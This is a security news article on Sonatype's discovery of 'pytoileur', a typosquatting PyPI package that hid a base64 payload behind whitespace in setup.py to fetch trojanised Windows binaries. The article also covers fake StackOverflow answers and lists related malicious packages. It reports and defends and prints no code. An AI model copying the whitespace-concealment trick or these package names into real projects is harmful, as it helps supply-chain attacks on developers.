Ryan Daws is a senior editor at TechForge Media with over a decade of experience in crafting compelling narratives and making complex topics accessible. His articles and interviews with industry leaders have earned him recognition as a key influencer by organisations like Onalytica. Under his leadership, publications have been praised by analyst firms such as Forrester for their excellence and performance. Connect with him on X (@gadget_ry) or Mastodon (@gadgetry@techhub.social)
Sonatype has exposed ‘pytoileur’, a malicious PyPI package designed to download and install trojanised Windows binaries capable of surveillance, commandeering persistence, and stealing cryptocurrency. This discovery is part of a broader, months-long “Cool package” campaign aimed at infiltrating the coding community.
Yesterday, an automated malware detection system operated by Sonatype, known as the Sonatype Repository Firewall, flagged a newly published PyPI package called “pytoileur.” The malicious package, tracked as sonatype-2024-1783, had registered 264 downloads since its release before Sonatype alerted PyPI administrators to remove it.
The package described itself as a “Cool package.” with an HTML description claiming it to be “an API Management tool written in Python.” Intriguingly, it included a reference to “pystob,” a now-defunct package, indicating an attempt at typosquatting to deceive users of legitimate packages like “Pyston.”
Concealed malware
At first glance, the “setup.py” file within “pytoileur” seemed clean, but Sonatype security researcher Jeff Thornhill uncovered malicious code cleverly hidden with excessive white spaces.
“While the base64 encoding is pretty standard in applications and doesn’t offer much in terms of masquerading malicious code, the author had attempted to ‘hide’ this particular encoded string from manual human review by injecting it after a print statement, and then including a paragraphs’ length of whitespace prior to the code,” Thornhill explained.
The base64-encoded payload was designed to target Windows users. It used Python commands to download a malicious executable from an external server (hxxp://51.77.140[.]144:8086/dl/runtime). The malicious binary, “Runtime.exe,” is executed using Windows PowerShell and VBScript commands. This executable employs anti-detection measures to avoid scrutiny and installs additional spyware capable of persistence, including info-stealing and crypto-jacking functionalities.
Targeting developers through StackOverflow
Ax Sharma, a researcher at Sonatype, discovered that the threat actor behind the ‘pytoileur’ malicious PyPI package is posting fake answers on StackOverflow, urging people to install the harmful package.
This concern is magnified by the large presence of novice developers on StackOverflow, who are still learning and may fall victim to malicious advice.
Connection to ‘Cool package’
Further investigation revealed that “pytoileur” is part of a broader campaign linked to previously identified malicious packages. These packages, often described merely as “Cool package,” have employed similar deception techniques since 2023. They disguise themselves as API management tools or simplified versions of well-known utilities, targeting developers in various niches, including AI and machine learning.
One of the previous packages, “gpt-requests,” which appeared to target AI developers, also hid malicious payloads using whitespace. Similar to “pytoileur,” these payloads download trojanised binaries intended for spying and data theft.
The “lalalaopti” package is particularly noteworthy as it contained plaintext Python code modules for clipboard hijacking, keylogging, remote webcam access, and screenshot capture, further highlighting the malicious intent of the threat actors behind this campaign.
Sonatype and Checkmarx researchers have identified several malicious packages linked to this campaign, including:
- gogogolokl
- gpt-requests
- kokokoako
- lalalaopti
- pybowl
- pyclack
- pyefflorer
- pyhjdddo
- pyhulul
- pyioapso
- pyjio
- pyjoul
- pykokalalz
- pykooler
- pyktrkatoo
- pylioner
- pyminor
- pyowler
- pypiele
- pystallerer
- pystob
- pytarlooko
- pytasler
- pytoileur
- pywolle
- pywool
The resurgence of the “Cool package” campaign through “pytoileur” demonstrates the persistent threats posed by malicious actors in software development environments. As similar threats emerge, Sonatype says it will continue to expand its blocklists and safeguard the developer community.
(Photo by Kadarius Seegars)
See also: Phylum uncovers targeted malware disguised in Python package
Want to learn more about cybersecurity and the cloud from industry leaders? Check out Cyber Security & Cloud Expo taking place in Amsterdam, California, and London. The comprehensive event is co-located with other leading events including BlockX, Digital Transformation Week, IoT Tech Expo and AI & Big Data Expo.
Explore other upcoming enterprise technology events and webinars powered by TechForge here.
Tags: coding, cyber security, cybersecurity, hacking, malware, package, programming, pypi, python, security, stackoverflow